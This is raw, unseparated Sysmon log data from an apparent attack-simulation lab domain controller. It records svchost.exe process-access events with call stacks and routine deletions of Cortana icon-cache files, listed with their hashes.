dll+51821 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{FEEDCB9B-F3C5-495B-A8D7-84F79D27D88E}MD5=9FCDA9AF0663B95421B2DF4DF2E1B9D4,SHA256=B3003B1A6220FA0F3390E2F297DFA4209C45C3D8FB9B55ABBA2507792720A89C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{FE283CE6-7678-4BF6-BD45-D855B6683130}MD5=3E30C6D0FC6DB0EE27A19FCF25DF566B,SHA256=EA12C2CD052FE46441BCC9C4FB81D9D52C1FEE3AEE762C09EB2FE34D19B1D2A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E79AFC5E-81E0-48C0-B2B8-B0755C4E824D}MD5=8571A37EA5341C6306283678D6D7B3F7,SHA256=DA51B889B504FE15B3526AA6A87A4A9843989F4EB6D32CFB205861A223030B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E46F3460-B4C6-40F2-9BF2-B4D9A4F6ED86}MD5=DB04268CDC55A7FE26A2F145F86BF875,SHA256=CFACBA24A15CFB163790F9C67CDB2B2CC82CE006B9E32AC8687DBFC7DB69B258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E28967A0-A00F-44F4-BEB5-D1DC1F682F91}MD5=D073912E2B55F885ADC380FB3849A88D,SHA256=3D6632DD180019CC415F024A5C0724886E4F5E90116E78F5B390E09475C8A1C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E1C5F6E0-5D96-4432-9C54-B630B005F17D}MD5=A220E6F69189C7C262EA46B8EE8E6FE4,SHA256=556020DC6EFBDBF8054FAEEE15519516CBF2B11904D5AF9E04D041D7480BCA58,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{DE7873BF-B56F-4465-AA14-AD810677CFF1}MD5=5E62597AD6E77746796E3B8571490D14,SHA256=45FB70B917C807BEFD513465866C4D27A4E869DA31182CDCF6D314DF224EB651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D7779C65-D55A-4E6E-AB28-222AD101D61C}MD5=9001B10995D8FDABC78945D7B210649D,SHA256=92818CA4F5FB7F3808ABFDE9EFED7E2292FBE9195366132EDB50F3A246CA00B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{CAD3CFB0-7CDE-43F8-B95D-98E958A585B7}MD5=41ABD480C1392D97DF3ACFFE760D2804,SHA256=7BEF858DA7D8B87F8E4C7804731E91AF5618DF4838EFC2BE398F609078268479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{C5DABA0D-CF94-465F-9B6B-C598EE8CCEE8}MD5=DEAC14151C0C509293EEE44191D9CD8D,SHA256=A169AF78E7C013538AE66FC03A2B859A0D6D4F5D5F77BFF03415E9C25084B430,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{BBD6B771-DF9C-48D4-99BF-77C177FAAD05}MD5=ED16924B1B7A952B1CB20D8515BEBB70,SHA256=6966D629DD24B6904DB8AA9C9F06197706E039848C15BE8FA738E4ED25F06B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=019055B3C33F2D1C157E94A14AD44BB5,SHA256=6E5472FCADCA41C68C60DCD7108A27487FCDC2CE3352D78C8C3893525CA7B4CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B69C64CD-23EC-43CB-8DAE-EB6560EAACC3}MD5=A461B8A48DB3B6C08E072140728A43C4,SHA256=21C57136A790877DA3640B5691C0F651D503D133B2B6936F5203BEE3F30A9565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B59BA0CB-7100-4018-A4F9-D539D5F4E058}MD5=DA594A38AD299ADA683372EBA5881CAD,SHA256=F0529ED98871CFB5607C993309D0A3DDB84CE36EC2E41897CB6BD8EB683711CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B4D06CEE-9D19-4A4D-B72A-396F2B566927}MD5=5F0A30B2DC6750BA2867B7BC006BD8FB,SHA256=9051D648449406B051B8A06D3372962529004EE159132D437E89AB6AEFA8A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B14CA865-C958-4580-9074-7E92964475FC}MD5=73252311BC2FB738EA33277A28F3596B,SHA256=7B6EA44D32065F717612C79F94114F9259C08D5465EBC007F16AEA92FD4D1CEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B0DD03EF-8C20-43DB-BDD2-4CFAB623574E}MD5=74017CA605E121CBA7CF92459B8C5638,SHA256=A4B6642597D4E32EB8FAC89CB4450E226C3978F963BDBFE95ECCAA527F1E8EAD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{AD913853-B212-444B-9876-3E2C3A49A8EB}MD5=206A73951B8654BD2B70962A78C00BE1,SHA256=19DA4F01CBB9BFDD977E06AF58B95CEC1D4A027C776A178469251B5F0B9D9A3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{A5400422-73B1-4B93-91A9-72E697208472}MD5=00B94F495BD57E421FEF46D7A1EECF44,SHA256=3C1C7F8A819B758DAD75031F99AEF06C94B418FA2FC199F82BFAE815483E11C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{A4E61E50-3EF0-4DA6-8275-CD489D676DAB}MD5=2BA0F2705632CB30D7BCA6DF8D087F2D,SHA256=7E47070E9ED1DFB752DD755B918F943B0B231C0885F55DF05EE82470595E3022,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{9D07DE99-52F7-454A-8CE6-31DA9AA94ED8}MD5=9456CEECAC6A1245C482C3B82593846D,SHA256=963DE82340F63CFB27DFDD15CD5643FE93D6C0AADB0B96B7923F0E23815F10CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{98C2D61D-6107-43E9-BCD8-6EB83D77ADEF}MD5=60FFAC14CA2196E3D54342C4C45F7C2B,SHA256=9979DFF1E142B348644E5C7735FCD13D8871408DCF4E0913D9FD9A3EC8436C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{9485A429-81C2-4352-A24F-92682A765D4B}MD5=349FE67C44E950D305D486C590998F2B,SHA256=B5832863667B94E5D9380583C2B626BC6969F8C9D362D2241F99C57ED5A4B157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{8D75FAE0-23F9-47DE-A54A-C2427D45DCAC}MD5=DEAC14151C0C509293EEE44191D9CD8D,SHA256=A169AF78E7C013538AE66FC03A2B859A0D6D4F5D5F77BFF03415E9C25084B430,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{8AB7F553-0827-496F-B610-82D31E06AC96}MD5=A2C26EBC40D4625D952314673C6141E9,SHA256=902AC55382C57835ED2151549B7D12211436E67A63B3B0E44FB384A661228729,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{891D5E7A-7A57-4CBF-9089-443EE49B6103}MD5=911DEFC897CECC2D0C78E5B96D5D515B,SHA256=965BD9A6F5738140EB5A51EFBC44129112C25FC82825BA7F30113602A6E8C902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{891649DE-3DE4-49E5-90AC-0987EA95353B}MD5=05F75F6404996B3E39476104E78DF209,SHA256=1E4258113A2D151783ADB9D626D38E7F67CFAB9C79FE14B27E07170081D145C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{84B49252-6DEC-40A8-90BE-86AE577E1B23}MD5=55F95E08D08A7A3768F27800D9217B04,SHA256=37F9BC821FDE92326D617E96AA6ADB2DBE7EB2666B1A88451F9410B80A774377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{829BE0F1-69E1-42FD-A3B6-359E1C3C1345}MD5=B467C6E316631A8A0420CB9F40222D93,SHA256=55336E857424336DBC05D5B2B96AEAAE4D296B1D6D5B031A5869B25143624085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{80A3BBAD-ABC2-4C9D-86E6-B04FA287F655}MD5=4174344A2D19128BADE81E2EB14BDC1D,SHA256=FC6C1C04EE333CB336B7DC428C25B995F7B85F49ADBDC88EBC7262C1307885FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{74B164BF-3E71-46AF-8ACB-AAA4A76A5378}MD5=349FE67C44E950D305D486C590998F2B,SHA256=B5832863667B94E5D9380583C2B626BC6969F8C9D362D2241F99C57ED5A4B157,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{735E8BE6-1731-42CA-A8F3-B53E930EDCDB}MD5=18E3CA8C6CCA69E00EC76747FAB81F0B,SHA256=08148891128E558A6C3CD3EEEE68457F3D1A10F1A2720DE0A4E27D1543A4F785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{72CE2732-257D-4200-8BC3-7ABC84224683}MD5=854754F8D9E7F7D9AAF2FA7F6BE1A1EF,SHA256=E6F4EFACF3E1CAD20C8245C7B9408E2BE2C2D6FD70B781F48A4BA22F067ED731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D1CC60E-42DB-4A1B-A50C-DC1DF51BFBF1}MD5=5E74B43DD59C1AB6F5244DA6154DDEB4,SHA256=DB8971C2F98690196197BC5A5875D3233E0FBC7B512BFA60659E67D5296FE080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6A253CE4-5CE2-4926-BF13-2F00787D2097}MD5=D9E99905D3D6FB42429AAF5DE84FCADA,SHA256=B8359F6E6BC9E16731B65A9F8253C86E846E9C1F951B1351CBD649FA6E286BC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{552E6613-D145-4B51-A24E-3C8B003E24A4}MD5=C359A6183B25EF8221256AFEDCE656B8,SHA256=E9122C2C02DEBBB1AFF1FBFE30465AFAA0CFBD4EAE9C10AEA58A6663DEE9EE8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{526402D0-291F-4761-931C-0273D14B2CF0}MD5=0CE681BD1598F07606E87609151DC42A,SHA256=1334CF9557C973A9F6AF7280C8C165C434A24947DE6E1647B27E62CB822FF31A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4FC5BD42-2CCF-4A96-AD8E-C83520ADB20F}MD5=922CD9F5F7320A813B0DAC1080EB7709,SHA256=346145F9100D8CA04CE7FC277D8775DF500D1FD1995F6CE28BBEEF685DFF04DF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4E171B62-A785-4231-B14E-626B192185F0}MD5=0796DDBF4C9B9D94DC5FD03E92485F28,SHA256=DBC10BA43AA770F1D3A36F7CAC2B50AE664804F28214B792E3C56266D7E8F377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4CC3BE49-DBA3-470D-94C8-20CE40F2BCAA}MD5=164DF3D6F46E23E2FA08C9D8B57D071C,SHA256=2CEAF005435274273EB097157EA09E468BCD39ED9A7D63ECD04A0C6986B1528C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4CA8F3BE-4DEC-4028-BAEF-6491FC4270C3}MD5=68F587A5B93845BD54716A6C6C932688,SHA256=3A319B5FA81F068C11959C024D08DADF279A00CA5C6B8C3F574C4DB64822AD56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4975E0B9-496B-4FF0-BC0E-1E06B22BDD96}MD5=C8B4FC8B8745BDE84005D690D3A026B2,SHA256=8779E3A2B6294AED675906209B8CD86FE1A79E0D3770AED38600278C29E6E55E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
